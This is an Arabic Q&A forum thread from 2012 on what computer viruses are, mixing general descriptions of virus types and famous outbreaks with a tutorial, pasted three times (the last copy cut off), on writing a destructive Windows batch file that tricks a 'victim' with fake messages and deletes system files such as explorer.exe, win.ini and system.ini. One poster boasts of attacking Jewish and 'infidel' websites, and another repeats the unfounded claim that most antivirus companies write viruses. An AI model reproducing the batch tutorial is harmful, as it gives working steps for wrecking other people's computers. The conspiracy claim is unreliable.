حدوث بطء شديد في إقلاع[نظام التشغيل]أو تنفيذ بعض التطبيقات. رفض بعض التطبيقات للتنفيذ.
فعند تشغيل البرنامج المصاب فإنه قد يصيب باقي الملفات الموجودة معه في قرص صلب أو المرن, لذا يحتاج الفيروس إلى تدخل من جانب المستخدم كي ينتشر, بطبيعة الحال التدخل عبارة عن تشغيله بعد أن تم جلبه من الايميل أوإنترنت أو تبادل الاقراص المرنة.
تعمل الفيروسات بطبيعتها على تعطيل عمل الحاسوب أو تدمير ملفاته وبرامجة هناك فيروسات تعمل على خلق رسائل مزعجة وأنواع تعمل على تشغيل برامج غير مطلوبة وأنواع تعمل على اشغال المعالج بحيث تبطئ سرعة الحاسوب أو سرقة بيانات من حاسوب المستخدم مثل ارقام حسابات وكلمات السر أو ارقام بطاقات الائتمان وبيانات مهمة أخرى وهذه أهم اهداف الفيروسات الحديثة وبرامج التجسس التي يتم تطويرها يوما بعد يوم
أنواع الفيروسات من حيث الانتشار

من حيث النوع
أنواع الفيروسات ثلاثة :(الفيروس والدودة وحصان طروادة) ما الفرق بين الفيروس والدودة وحصان طروادة؟
•الفيروس: يمكن القول بأنه برنامج تنفيذي(ذات نوع scr,.pif,.bat,.exe ,.com.) يعمل بشكل منفصل ويهدف إلى أحداث خلل في نظام الحاسوب وتترواح خطورتة حسب مهمته فمنه الخطير ومنه الخفيف وكلاهما خبيث.وينتقل بواسطة نسخ الملفات من جهاز به ملفات مصابة إلى جهاز اخر عن طريق الاقراص المدمجة سي دي وذواكر الفلاش.
•الدودةديدان الحواسيب: فيروس ينتشر فقط عبر الشبكات والإنترنت ويعمل على الانتشار على الشبكات عن طريق دفتر عنواين البريد الإلكتروني مثلا فعند اصابة الجهاز يبحث البرنامج الخبيث عن عناوين الاشخاص المسجلين في دفتر العناوين على سبيل المثال ويرسل نفسه إلى كل شخص وهكذا... مما يؤدي إلى انتشاره بسرعه عبر الشبكه وقد اختلف الخبراء فمنهم اعتبره فايروس ومنهم من اعتبره برنامج خبيث وذلك كون الدوده لاتنفذ اي عمل مؤذي انما تنتشر فقط مما يؤدي إلى اشغال موارد الشبكه بشكل كبير ومع التطور الحاصل في ميدان الحوسبه أصبح بإمكان المبرمجين الخبيثين إضافة سطر برمجي لملف الدوده بحيث تؤدي عمل معين بعد انتشارها (مثلا بعد الانتشار إلى عدد 50000 جهاز يتم تخريب الأنظمة في هذه الأجهزة) أو اي شيء اخر (مثلا في يوم معين أو ساعة أو تاريخ...الخ) وأصبحت الديدان من أشهر الفيروسات على الشبكه العالميه واشهر عملياتها التخريبيه واخطرها تلك التي يكون هدفها حجب الخدمه تسمى (هجمات حجب الخدمه) حيث تنتشر الدوده على عدد كبير من الأجهزة ثم توجه طلبات وهميه لجاهز خادم معين (يكون المبرمج قد حدد الخادم المستهدف من خلال برمجته للدوده) فيغرق الخادم بكثرة الطلبات الوهميه ولا يستطيع معالجتها جميعا مما يسبب توقفه عن العمل وهذه الديدان استهدفت مواقع لكثير من الشركات العالميه اشهرها مايكروسوفت وغيرها الكثير.
•حصان طروادة Trojan Horse: سمي هذا الفيروس بحصان طروادة لانه يذكر بالقصة الشهيرة لحصان طروادة حيث اختبأ الجنود اليونان داخله واستطاعوا اقتحام مدينة طرواده والتغلب على جيشها وهكذا تكون الية عمل هذا الفيروس حيث يكون مرفقا مع أحد البرامج أي يكون جزء من برنامج دون أن يعلم المستخدم. فعندما يبدأ البرنامج تنفيذ عمله ويصل إلى مرحلة ما حيث تم توزيع قرص مجاني على المشافي به برنامج حول مرض الايدز (أسبابه - طرق انتشاره - طرق العلاج.. الخ) وبعد مدة شهر من تشغيل البرنامج تم تشفير المعلومات على الحواسب الحاضنه للفايروس وظهرت رساله مفادها ان الحاسب مصاب بالايدز (المقصود هنا انه تم تشفير ملفات الحاسب وايقافها عن العمل بطريقه نظاميه) ارسل مبلغ كذا إلى الحساب كذا ليتم إرسال رقم فك الشيفره مما اجبر المختصين بالرضوخ للطلب كونهم لم يستطيعو فك التشفير.
من حيث السرعة
توجد عدة تقسيمات للفيروسات، فمثلاً من حيث سرعة الانتشار هناك فيروسات سريعة الانتشار وفيروسات بطيئة الانتشار ومن حيث توقيت النشاط فهناك فيروسات تنشط في أوقات محددة وفيروسات دائمة النشاط ومن حيث مكان الإصابة فيروسات مقطع التشغيل boot sector على الأقراص وهي الأكثر شيوعاً، وفيروسات الماكرو macro التي تختص بإصابة الوثائق والبيانات الناتجة عن حزمة مايكروسوفت أوفيس، أما من حيث حجم الضرر فهناك الفيروسات المدمرة للأجهزة طبعا لايوجد فايروسات خارقه بحيث انها تدمر الأجهزة كما نسمع أحيانا (احترق المعالج بسبب الفايروس تعطلت وحدة التغذيه بسبب الفايروس أو تلفت الشاشة بسبب الفايروس ،... الخ) ولكن يمكن للفايروس ان يؤذي الذاكره روم في الحاسب كما في فايروس تشرنوبل أو ان يمحي معلومات ال (MBR (Main Boot Sector على القرص الصلب فتعود الاقراص الصلبه كما اتت من المصنع وفي الحالتين السابقتين لا يتم اقلاع الجهاز مما يوحي للبعض ان الفايروس (حرق) الحاسب طبعا هذه الفيروسات تعتبر خطيره جدا لانها تتسبب في اتلاف البيانات المخزنه والتي قد تكون (البيانات) نتاج عشرات السنين مما يؤديي إلى خسائر جسيمة أو إلى توقف الحاسبات عن العمل كما في تشرنوبل مما يؤدي إلى توقف الخدمات المقدمه، وهنالك أيضا الفيروسات المدمرة للبرامج وتاثيرها محدود طالما ان البيانات لم تتاثر حيث يمكن تخزين البيانات واعادة تهئية الحاسب واعادة البرامج المتضرره من اقراصها الاصليه، والفيروسات عديمة الضرر وهي التي لاتقوم باي عمل مؤذي وانما تم برمجتها لاثبات الذات والقدره على البرمجه من بعض المراهقين فمنها ما يرسم كرة أو اي شكل على الشاشه طوال فترة عمل الكمبيوتر ومنها ما يغير بعض الاحرف (كتغير حرف بحرف اينما وجد) أو تغيير مؤشر الماوس.. الخ.
انواع الفيروسات

أنواع الفيروات هي كالتالي:
1- الفيروسات متعددة القرة التحويلية(مخادع) : هذه الفيروسات لديها القرة الديناميكية على تحويل وتغيير شفرتها عند الانتقال من ملف إلى أخر لكي يصعب اكتشافها.
2- فيروسات قطاع التشغيل : تستقر هذه الفيروسات في الأماكن التي يقراها الكمبيوتر بالقرص الصلب عند اقلاعه (تشغيله) ليستقر في الذاكره وينفذ شفرته.
3- فيروسات الماكرو: وهو أحدث أنواع الفيروسات وهو فيروس يكتب بلغة الورد WORD ويصيب هذا الفيروس ملفات البيانات. ويوصيب ملفات الأوفيس
4- الفيروسات متعددة الملفات: يبدأ هذ الفيروس في الجهاز بصيغة أوليه ثم يتحول لصيغ أخرى ليصيب ملفات أخرى.
5- الفيروسات الخفية : تختبئ هذه الفيروسات في الذاكره ثم تتصدى لي اي طلب تشخيص وفحص قطاع التشغيل ليرسل تقريرا بأن قطاع التشغيل سليم وغير مصاب.
6- فيروسات الملفات التنفيذية: تلصق هذه الفيروسات نفسها مع ملفات البرامج التنفيذية مثل command.com و win.com
7- الفيروسات متعددة الأجزاء(أو متعددة المهام) : يصيب هذه الفيروس قطاع الأقلاع (بدأ التشغيل) والمفات في وقت واحد.
8- فيروسات قطاع التشغيل Boot Sector : وهي أخطر أنوع الفيروسات حيث تصيب المقطع التشغيلي في القرص الصلب.
9 - الفيروسات الطفيلية: تلتصق هذه الفيروسات مع الملفت التنفيذية لتستقر في الذاكره عند عمل أحد البرامج المصابه ثم تنتظر في الذاكره الى ان يشغل المشتخدم برنامجا اخرى فتقوم باصابته ونقل العدوى له.
10- الفيروسات المتطوره : وسميت بذلك لانها تغير شفرتها ايضا ولكن عند الانتقال من جهاز لاخر.
امثلة على بعض الفيروسات

فيروس Brontok أو الفيروس الذي يخفي خيارات المجلداو يفقدك التحكم في الرجستري فتصبح غير قادر على التحكم في الحاسوب: هذا الفيروس من أبرز مهامه أنه يقوم بإخفاء خيارات المجلد من قائمة أدوات الموجودة في نظام الويندوز وأيضا يقوم بتكرار جميع المجلدات التي يصيبها حتى أنك لاتعرف الأصل من النسخة وقد تحذف الأصل ظنا منك أنه الفيروس، وهو أيضا يقوم بفتح شاشة الإنترنت اكسبلورر ويقوم بفتح شاشة خضراء اللون بشكل مستمر ممايسبب بطء في النظام ومما يؤدي ألى زيادة انتشار هذا الفيروس في الكمبيوتر
فيروس xcopy والذي يصيب الـ Partion القسم للقرص الصلب ويجعله لايفتح مباشرة وذلك بزرع ملف autorun وحينما تحاول فتح القسم يعطيك قائمة فتح باستخدام ولا تستطيع الدخول إلى القسم الذي تريده إلا بطرق ملتوية مثل (استكشاف وتشغيل) للمحترفين فقط ويقوم أيضا بجعل الفلوبي دسك القرص المرن يصيح باستمرار مطالبا بإدخال قرص مرن للكمبيوتر تصنيف الفيروسات حسب خطورتها :
العادي Trivial :
لا يفعل الفيروس العادي شيئا سوى التكاثرreplication ولا يسبب أي ضرر أو تخريب للمعلومات مثل فيروس stupid
الثانوي Minor :
يصيب الملفات التنفيذية فقط executable file ولا يؤثر على البيانات
المعتدل Moderate :
يقوم بتدمير جميع الملفات الموجودة على القرص إما باستبدال المعلومات بمعلومات لا معنى لها أو عن طريق إعادة التهيئة Reformatting مثل فيروس Disk killer الذي يقوم بإعادة تهيئة القرص. ويمكن حل مشكلة هذه الفيروسات عن طريق استخدام النسخ الاحتياطي
الرئيسي Major :
يؤدي الفيروس إلى تخريب المعلومات بإجراء تغيرات ذكية وبارعة للبيانات دون أن يترك أثرا يشير إلى التغيير الحاصل كأن يقوم بتبديل كتل المعلومات المتساوية في الطول بين الملفات كما أن تأثيره يكون على المدى الطويل ولن يكون من الممكن اكتشاف الإصابة إلا بعد بضعة أيام وبذالك لا يمكن الوثوق بالنسخة الاحتياطية أيضا.
اللامحدود Unlimited :
يستهدف الشبكات والملفات المشتركة وتمضي أكثر الوقت في محاولة معرفة كلمة السر للمستخدمين الأكثر فاعلية وعند معرفتها يقوم بتمريرها إلى أحد أو أكثر من مستخدمي الشبكة على أمل أنهم سيستخدمونها لأغراض سيئة. ترينا الفيروسات كم نحن معرضين للهجوم ولكن بالمقابل ترينا مدى التعقيد والترابط الذي وصل إليه الإنسان. على سبيل المثال
My doom : قدر الخبراء الحواسيب المتضررة من هذه الدودة بحوالي ربع مليون حاسوب خلال يوم واحد والذي كان في كانون الثاني 2004
Melissa: أعطى هذا الفيروس فاعلية كبيرة جدا حيث أجبر شركة Microsoft والعديد من كبرى الشركات الأخرى على إطفاء مخدمات البريد بشكل كامل حتى تمكنوا من القضاء عليه وذلك في آذار 1999
وفي الشهر الأول من عام 2007 ظهرت دودة اسمها Storm وبحلول الشهر التاسع كان أكثر من 50 مليون حاسوب مصاب. كلنا تصور أن كل هذا التأثير ينتج عن برامج بسيطة جدا.
فيروس Melissa :
أنشاء الفيروس على شكل مستند Word ووضع في موقع للأخبار عندما يقوم أي شخص بتحميل الملف وفتحه فإن الفيروس يتفعل ويقوم بإرسال المستند إلى أول 50 شخص في الAddress book والمستند يحوي على ملاحظة لطيفة واسم الشخص المرسل إليه وعندما يقوم المرسل إليه بفتح المستند يتم إرساله إلى 50 شخص أخر وبهذه الطريقة أصبح فيروس Melissa أسرع فيروس في الانتشار
الفيروس I love you الطريق نفسها لكن عوضا عن نسخ نفسه تلقائيا فأنه كان يربط كوده برابط معين ضمن الرسالة وعند النقر عليه كان يرسل نفسه إلى جميع العناوين الموجودة في الAddress book
استخدم الفيروس ميزة الVBA (visual basic for application) وهي لغة برمجة كاملة وتستطيع من خلالها أن تبرمج أي شيء مثل تعديل ملف أو إرسال الرسائل الإلكترونية أي يمكنك كتابة أي برنامج وعند فتح المستند يتم تنفيذه طبعا هي ميزة مفيدة ولكنها في نفس الوقت ميزة تنفيذ تلقائية خيرة
لماذا يعمل الناس فيروسات الحاسوب ?

فيروسات الحاسوب لا تتشابه في وجودها بالفيروسات الحيوية. إن فيروس الحاسوب لا ينشأ من لا شيء ولا ياتي من مصدر مجهول ولا ينشأ بسبب خلل بسيط حدث في الحاسوب. فيروس الحاسوب يتم برمجته من قبل المبرمجين أو الشركات ويتم صنعه بشكل متعمد ويتم تصميمة بشكل متقن. يعمل المبرمجون على برمجة الفيروسات وذلك لاهداف عديدة تتنوع من اقتصادية وسياسية وتجارية وعسكرية. فبعض المبرمجين الهواة يعتبرون أن عمل الفيروس نوع من الفن والهواية التي يمارسونها. ومن أهم الأهداف لعمل فيروس الحاسوب هو الهدف التجاري. ذلك عن طريق عمل وصنع الفيروسات من أجل بيع برامج مضادات الفيروسات لانة بعمل الفيروس يصبح المستخدمون بحاجة إلى برامج مضادة للفيروسات ويضطرون للشراء. يذكر أن المبرمج الذي يعمل الفيروس يعتبر حسب القانون مجرما وصناعة الفيروس جريمة يحاسب عليها حسب قانون الدولة الموجود بها.
معظم شركات مضادات الفيروسات تقوم بصناعة الفيروسات من قبل المبرمجين وتقوم بعمل مضادات لها وذلك لتسويق منتجاتها وبرامجها لدى مستخدمي الكمبيوتر. اما الاهداف العسكرية فهي محاولة الدخول لأنظمة الطرف الاخر لكشف اسرار واخذ بيانات عن طريق برامج التجسس. الاهداف الإجرامية فأهمها سرقة بيانات وارقام حسابات أو ارقام بطاقات الائتمان وكلمات السر لمحاولة الدخول لحسابات المشتركين في البنوك وسرقة اموالهم. أو سرقة بيانات من اجهزتهم.

^_^
19‏/6‏/2012 تم النشر بواسطة دومينو (Yamy zx).
19 من 44
اذكر الله يذكرك . لا اله الا الله محمد رسول الله .
19‏/6‏/2012 تم النشر بواسطة اليل 82 (ان تنصرو الله ينصركم).
20 من 44
الفيروسات هي برامج كمبيوتر كبقية البرامج لكن وضيفتها التخريب أو التنصت والتجسس على معلوماتك الخاصة
ويتم التخلص منها عن طريق برامج ازالة الفيروسات والجدار الناري
19‏/6‏/2012 تم النشر بواسطة بدون اسم.
21 من 44
19‏/6‏/2012 تم النشر بواسطة saad nadifi (Saad Nadifi).
22 من 44
لا اعرف
20‏/6‏/2012 تم النشر بواسطة pisoo (حـيونـة الانـســان).
23 من 44
موضوع رائع رائع انا اشكر السائل واشكر المشرف على هذا الاختيار الموفق وجميع الاعضاء
20‏/6‏/2012 تم النشر بواسطة .فيصل الحربي (فيصل الحربي).
24 من 44
بالفوتوشوب
20‏/6‏/2012 تم النشر بواسطة pain-16.
25 من 44
فيروس الحاسوب هو برنامج خارجي صنع عمداً بغرض تغيير خصائص الملفات التي يصيبها لتقوم بتنفيذ بعض الأوامر إما بالإزالة أو التعديل أو التخريب وما شابهها من عمليات. اي ان فيروسات الكومبيوتر هي برامج تتم كتابتها بواسطة مبرمجين محترفين بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه أو سرقة بيانات مهمة، وتتم كتابتها بطريقة معينة.
يتصف فيروس الحاسب بأنه :
برنامج قادر على التناسخ Replication والانتشار.
الفيروس يربط نفسه ببرنامج أخر يسمى الحاضن host.
لا يمكن أن تنشأ الفيروسات من ذاتها.
يمكن أن تنتقل من حاسوب مصاب لآخر سليم.
20‏/6‏/2012 تم النشر بواسطة abo0od.alfifi.
26 من 44
الفيروس هو مجموعة أوامر تدميرية تعمل تحت أى ظروف وهذا هو الفرق بين الفيروس و الجرثومة فالجرثومة لها وظيفة محددة وفى ظروف محددة
البرامج المستخدمة فى صناعة الفيروسات
نستطيع صناعة الفيروسات بأبسط برنامج فى الويندوز أوهو Notepad أو المفكرة ولاتتعجب
طريقة حفظ الفيروس بحيث يكون جاهز للعمل
مش هنحفظه بإمتداد txt هنحفظ بإمتداد bat وده يخلى كل الأوامر الى دخلناها فى المفكرة تشتغل على الدوس
طب لما نحب نفتحه تانى بالنوت باد علشان نعدل فيه نعمل إيه ؟
كليك يمين على الفيروس واختار Edit
أوامر صناعة الفيروسات

@pause
لإيقاف الفيروس حتى يضغط المستخدم أى مفتاح
فإذا وضعنا هذا الأمر فقط فى المفكرة
وقمنا بالحفظ كما تعلمنا بإمتداد bat
هنلاقى نافذة الدوس فتحت الشكل ده
دوس أى حاجة هتلاقى الشاشة اختفت

@echo
يعرض كلمات لا دخل لها بالكود تظهر أثناء العرض للضحية

يعنى مثلا عايزين نراوغ شوية مع الضحية نقوله عايزين نقوله Say Good Bye To Your Computer
يبقى نخليها
@echo Say Good Bye To Your Computer

دلوقتى نحظها فى النوت باد ونحط تحتيها الأمر @pause
ونشغل الملف هنلاقة الدوس فتح
واحد هيقولى يعنى يا عصب هو الضحية هيدوس أى حاجة لما يشوف الرسالة دى ؟اقوله ده مثال فقط المفروض دى بتستخدم كخدع علشان مش يحس انه فيروس يعنى مثلا تقوله لزيادة سرعة جهازك عن طريقة مسح ملفات غير ضرورية اضغط أى مفتاح ... الخ

:exit

لإغلاق شاشة الفيروس تمام وهى غير ضرورية فى الإكس بى و2000 و 2003 علشان الدوس بيقفل اوتوماتيك لما الامر يخلص
إنما ضرورية جداً فى الإصدارات القديمة Me و 98 و 95 علشان الشاشة هتفضل مفتوحة حتى بعد نهاية الكود والضحية هيشوف الأوامر الى اتنفذت عنده

cls

لتنظيف الشاشة من كل الأكواد ومن الأفضل ان تكون دائما فى آخر الكود قبل :exit علشان لو حصل خطأ الضحية ما يعرفش إيه الى تم عنده

%WinDir%
لتحديد مسار الويندوز

del , deltree

دول الأوامر الى هنستخدمها للمتدمير يعنى الفيروس الى هنعمله هيخرب الويندوز عن طريق مسح ملفاته
del لمسح ملف مباشر أو مجلد
deltree لمسح كل محتويات مجلد ولكنه به مشكلة أولا وهى (Y/N) يخير بين القبول والرفض وهذا كاف لإيقاف عمل الفيروس

لذا سنستخدم الأمر del للمسح فمثلا سنقوم بعمل ملف تكست على السى باسم 1.txt
ولمسحه سنستخدم هذا الأمر del C:\1.txt
والأفضل ان تضيف بعده :exit

شغل الفيروس ولاحظ الملف هتلاقيه اتمسح

دلوقتى احنا عايزين نمسح ملف جوة الويندوز
نروح نعمل ملف تكست زى الى كنا عاملينه فى السى بس المرة دى فى الويندوز ونسميه برضه 1.txt

تعليم صناعة الفيروسات الالف الياء

يبقى الكود المستحدم del %WinDir%\1.txt
نشغل الفيروس ونلاحظ الملف هنلاقيه اتمسح

واحد هيقولى طب ما احنا كده نقدر نمسح كل ملفات الويندوز مباشرة عن طريق إبدال 1.txt بـ *.*
أقوله لو جربتها الويندوز بيعرف إن حجم التدمير كبير فبيسأل المستخدم متأكد ولا لأ (Y/N)
هتقولى ما احنا كنا بنستخدم الدالة /y فى آخر السطر للموافقة على أى (Y/N)
هقولك جرب بنفسك ضيف السطر كده

del %WinDir%\*.* /y
هتلاقى العملية مشيت والفيرس انتهى الكود بس الملفات لسه موجودة !!!

دلوقتى أكيد انتم فهمتم الفكرة كلها احنا دلوقتى جوة الويندوز نقدر نمسح الى عايزينه و 90% منها ملفات حساسة يعنى التخريب هيتم

ودى بعض الاكواد لإسقاط الويندوز

del %WinDir%\explorer.exe
del %WinDir%\NOTEPAD.EXE
del %WinDir%\ISUninst.exe
del %WinDir%\wjview.exe
del %WinDir%\win.ini
del %WinDir%\system.ini

وطبعا أكيد كلكم عارفين أماكن الملفات التانية الحساسة


الحماية والوقاية من هذا النوع من الفيروسات

تحميل برنامج الكاسبر سكاى انتى فيروس فهو من البرامج القلية التى تحدد هذا النوع نت الفيروسات
20‏/6‏/2012 تم النشر بواسطة العبودى (خالد العبودى).
27 من 44
عن طريق الـNotepad
عن طريق برنامج الفجول بيسك (VB) و ++C
عن طريق برامج تصميم الفيروسات ( خطيرة جدا و فيروساتها قوية – لكن اغلبها يكشفه برامج مكافحة الفيروسات)
20‏/6‏/2012 تم النشر بواسطة أبو غضب (أبــو غـــضـــب).
28 من 44
أنا مصمم فايروس ولكن لا أستخدمه ضد الأسلام
أستخدمه في تلغيم المواقع اليهودية والكفار

وأستخدمه للمصالح الشخصية

الفايروس :
هو عبارة عن  أوامر تكتب باللغة البرمجية (( عن طريق الدفتر أو المستند النصي ))
أو عن طريق الفيجوال بكل أصدارته  والبرامج المتخصصة لصناعة الفايروس

أنا أصنع الفايروس عن طريق الدفتر  والفيجوال أذا لزم الأمر لصناعة الفايروس للتطبيقات

تــــــــحياتي لكل الأعضاء
20‏/6‏/2012 تم النشر بواسطة YamenSweed (Yamen Sw).
29 من 44
مين جاب سيرتي ؟
20‏/6‏/2012 تم النشر بواسطة XxXx Virus xXxX.
30 من 44
هناك شركات تحاول تعطيل ميكروسوفت ويندوز و تنشر فيروسات ربي يحمي اجهزتنا
20‏/6‏/2012 تم النشر بواسطة بنت الرمال.
31 من 44
فيروسات الكمبيوتر..
20‏/6‏/2012 تم النشر بواسطة غزالة مفترسة (غزالة مفترسة).
32 من 44
استخدم نظام لينكس وريح نفسك فالنظام ده امن بشكل رهيب ولا تحتاج ان تستخدم معه اى برنامج انتى فيرس وكمان تخيل سرعة النت معاه بتبقى عامله ازاى علشان الانتى فيرس بيقلل من سرعة النت وكمان شكله جميل جدا
20‏/6‏/2012 تم النشر بواسطة عماد حسنى (Emad Hosney).
33 من 44
انا اصنع برامج فيروسات بس مالها مفعول قوي لكن في تصاعد تدريجي
20‏/6‏/2012 تم النشر بواسطة طالع نازل السلم.
34 من 44
حرآآآآآآآمٍ عڵۑڪ آڏآ بٺڛٺعمٍڵھٍآ عڵى أحډ آڵڵھٍ بۑڿڵۑ أحډ ۑعمٍڵڪ ۑآھٍآ بڛ آڏآ ڪڹٺ مٍضطر أۅ ڵڜۑء ضرۅرۑ أۅ أحۑآڹآً ٺڪۅڹ ڵۅچھٍ آڵڵھٍ

آڣٺح مٍۅقع برآمٍچ ڛۅڣٺ ۅأڪٺب ٺڝمٍۑمٍ آڵڣآۑرۅڛآٺ ۅآڹڜآڵڵھٍ ۑڣۑډڪ
20‏/6‏/2012 تم النشر بواسطة بدون اسم.
35 من 44
سوال باااايخ و تقيل مع احترامي...
20‏/6‏/2012 تم النشر بواسطة xàbà7.
36 من 44
فيروس هو مجموعة أوامر تدميرية تعمل تحت أى ظروف وهذا هو الفرق بين الفيروس و الجرثومة فالجرثومة لها وظيفة محددة وفى ظروف محددة
البرامج المستخدمة فى صناعة الفيروسات
نستطيع صناعة الفيروسات بأبسط برنامج فى الويندوز أوهو Notepad أو المفكرة ولاتتعجب
طريقة حفظ الفيروس بحيث يكون جاهز للعمل
مش هنحفظه بإمتداد txt هنحفظ بإمتداد bat وده يخلى كل الأوامر الى دخلناها فى المفكرة تشتغل على الدوس
طب لما نحب نفتحه تانى بالنوت باد علشان نعدل فيه نعمل إيه ؟
كليك يمين على الفيروس واختار Edit
أوامر صناعة الفيروسات

@pause
لإيقاف الفيروس حتى يضغط المستخدم أى مفتاح
فإذا وضعنا هذا الأمر فقط فى المفكرة
وقمنا بالحفظ كما تعلمنا بإمتداد bat
هنلاقى نافذة الدوس فتحت الشكل ده
دوس أى حاجة هتلاقى الشاشة اختفت

@echo
يعرض كلمات لا دخل لها بالكود تظهر أثناء العرض للضحية

يعنى مثلا عايزين نراوغ شوية مع الضحية نقوله عايزين نقوله Say Good Bye To Your Computer
يبقى نخليها
@echo Say Good Bye To Your Computer

دلوقتى نحظها فى النوت باد ونحط تحتيها الأمر @pause
ونشغل الملف هنلاقة الدوس فتح
واحد هيقولى يعنى يا عصب هو الضحية هيدوس أى حاجة لما يشوف الرسالة دى ؟اقوله ده مثال فقط المفروض دى بتستخدم كخدع علشان مش يحس انه فيروس يعنى مثلا تقوله لزيادة سرعة جهازك عن طريقة مسح ملفات غير ضرورية اضغط أى مفتاح ... الخ

:exit

لإغلاق شاشة الفيروس تمام وهى غير ضرورية فى الإكس بى و2000 و 2003 علشان الدوس بيقفل اوتوماتيك لما الامر يخلص
إنما ضرورية جداً فى الإصدارات القديمة Me و 98 و 95 علشان الشاشة هتفضل مفتوحة حتى بعد نهاية الكود والضحية هيشوف الأوامر الى اتنفذت عنده

cls

لتنظيف الشاشة من كل الأكواد ومن الأفضل ان تكون دائما فى آخر الكود قبل :exit علشان لو حصل خطأ الضحية ما يعرفش إيه الى تم عنده

%WinDir%
لتحديد مسار الويندوز

del , deltree

دول الأوامر الى هنستخدمها للمتدمير يعنى الفيروس الى هنعمله هيخرب الويندوز عن طريق مسح ملفاته
del لمسح ملف مباشر أو مجلد
deltree لمسح كل محتويات مجلد ولكنه به مشكلة أولا وهى (Y/N) يخير بين القبول والرفض وهذا كاف لإيقاف عمل الفيروس

لذا سنستخدم الأمر del للمسح فمثلا سنقوم بعمل ملف تكست على السى باسم 1.txt
ولمسحه سنستخدم هذا الأمر del C:\1.txt
والأفضل ان تضيف بعده :exit

شغل الفيروس ولاحظ الملف هتلاقيه اتمسح

دلوقتى احنا عايزين نمسح ملف جوة الويندوز
نروح نعمل ملف تكست زى الى كنا عاملينه فى السى بس المرة دى فى الويندوز ونسميه برضه 1.txt

تعليم صناعة الفيروسات الالف الياء

يبقى الكود المستحدم del %WinDir%\1.txt
نشغل الفيروس ونلاحظ الملف هنلاقيه اتمسح

واحد هيقولى طب ما احنا كده نقدر نمسح كل ملفات الويندوز مباشرة عن طريق إبدال 1.txt بـ *.*
أقوله لو جربتها الويندوز بيعرف إن حجم التدمير كبير فبيسأل المستخدم متأكد ولا لأ (Y/N)
هتقولى ما احنا كنا بنستخدم الدالة /y فى آخر السطر للموافقة على أى (Y/N)
هقولك جرب بنفسك ضيف السطر كده

del %WinDir%\*.* /y
هتلاقى العملية مشيت والفيرس انتهى الكود بس الملفات لسه موجودة !!!

دلوقتى أكيد انتم فهمتم الفكرة كلها احنا دلوقتى جوة الويندوز نقدر نمسح الى عايزينه و 90% منها ملفات حساسة يعنى التخريب هيتم

ودى بعض الاكواد لإسقاط الويندوز

del %WinDir%\explorer.exe
del %WinDir%\NOTEPAD.EXE
del %WinDir%\ISUninst.exe
del %WinDir%\wjview.exe
del %WinDir%\win.ini
del %WinDir%\system.ini

وطبعا أكيد كلكم عارفين أماكن الملفات التانية الحساسة


الحماية والوقاية من هذا النوع من الفيروسات

تحميل برنامج الكاسبر سكاى انتى فيروس فهو من البرامج القلية التى تحدد هذا النوع نت الفيروسات
20‏/6‏/2012 تم النشر بواسطة Abo-azam.
37 من 44
فيروس هو مجموعة أوامر تدميرية تعمل تحت أى ظروف وهذا هو الفرق بين الفيروس و الجرثومة فالجرثومة لها وظيفة محددة وفى ظروف محددة
البرامج المستخدمة فى صناعة الفيروسات
نستطيع صناعة الفيروسات بأبسط برنامج فى الويندوز أوهو Notepad أو المفكرة ولاتتعجب
طريقة حفظ الفيروس بحيث يكون جاهز للعمل
مش هنحفظه بإمتداد txt هنحفظ بإمتداد bat وده يخلى كل الأوامر الى دخلناها فى المفكرة تشتغل على الدوس
طب لما نحب نفتحه تانى بالنوت باد علشان نعدل فيه نعمل إيه ؟
كليك يمين على الفيروس واختار Edit
أوامر صناعة الفيروسات

@pause
لإيقاف الفيروس حتى يضغط المستخدم أى مفتاح
فإذا وضعنا هذا الأمر فقط فى المفكرة
وقمنا بالحفظ كما تعلمنا بإمتداد bat
هنلاقى نافذة الدوس فتحت الشكل ده
دوس أى حاجة هتلاقى الشاشة اختفت

@echo
يعرض كلمات لا دخل لها بالكود تظهر أثناء العرض للضحية

يعنى مثلا عايزين نراوغ شوية مع الضحية نقوله عايزين نقوله Say Good Bye To Your Computer
يبقى نخليها
@echo Say Good Bye To Your Computer

دلوقتى نحظها فى النوت باد ونحط تحتيها الأمر @pause
ونشغل الملف هنلاقة الدوس فتح
واحد هيقولى يعنى يا عصب هو الضحية هيدوس أى حاجة لما يشوف الرسالة دى ؟اقوله ده مثال فقط المفروض دى بتستخدم كخدع علشان مش يحس انه فيروس يعنى مثلا تقوله لزيادة سرعة جهازك عن طريقة مسح ملفات غير ضرورية اضغط أى مفتاح ... الخ

:exit

لإغلاق شاشة الفيروس تمام وهى غير ضرورية فى الإكس بى و2000 و 2003 علشان الدوس بيقفل اوتوماتيك لما الامر يخلص
إنما ضرورية جداً فى الإصدارات القديمة Me و 98 و 95 علشان الشاشة هتفضل مفتوحة حتى بعد نهاية الكود والضحية هيشوف الأوامر الى اتنفذت عنده

cls

لتنظيف الشاشة من كل الأكواد ومن الأفضل ان تكون دائما فى آخر الكود قبل :exit علشان لو حصل خطأ الضحية ما يعرفش إيه الى تم عنده

%WinDir%
لتحديد مسار الويندوز

del , deltree

دول الأوامر الى هنستخدمها للمتدمير يعنى الفيروس الى هنعمله هيخرب الويندوز عن طريق مسح ملفاته
del لمسح ملف مباشر أو مجلد
deltree لمسح كل محتويات مجلد ولكنه به مشكلة أولا وهى (Y/N) يخير بين القبول والرفض وهذا كاف لإيقاف عمل الفيروس

لذا سنستخدم الأمر del للمسح فمثلا سنقوم بعمل ملف تكست على السى باسم 1.txt
ولمسحه سنستخدم هذا الأمر del C:\1.txt
والأفضل ان تضيف بعده :exit

شغل الفيروس ولاحظ الملف هتلاقيه اتمسح

دلوقتى احنا عايزين نمسح ملف جوة الويندوز
نروح نعمل ملف تكست زى الى كنا عاملينه فى السى بس المرة دى فى الويندوز ونسميه برضه 1.txt

تعليم صناعة الفيروسات الالف الياء

يبقى الكود المستحدم del %WinDir%\1.txt
نشغل الفيروس ونلاحظ الملف هنلاقيه اتمسح

واحد هيقولى طب ما احنا كده نقدر نمسح كل ملفات الويندوز مباشرة عن طريق إبدال 1.txt بـ *.*
أقوله لو جربتها الويندوز بيعرف إن حجم التدمير كبير فبيسأل المستخدم متأكد ولا لأ (Y/N)
هتقولى ما احنا كنا بنستخدم الدالة /y فى آخر السطر للموافقة على أى (Y/N)
هقولك جرب بنفسك ضيف السطر كده

del %WinDir%\*.* /y
هتلاقى العملية مشيت والفيرس انتهى الكود بس الملفات لسه موجودة !!!

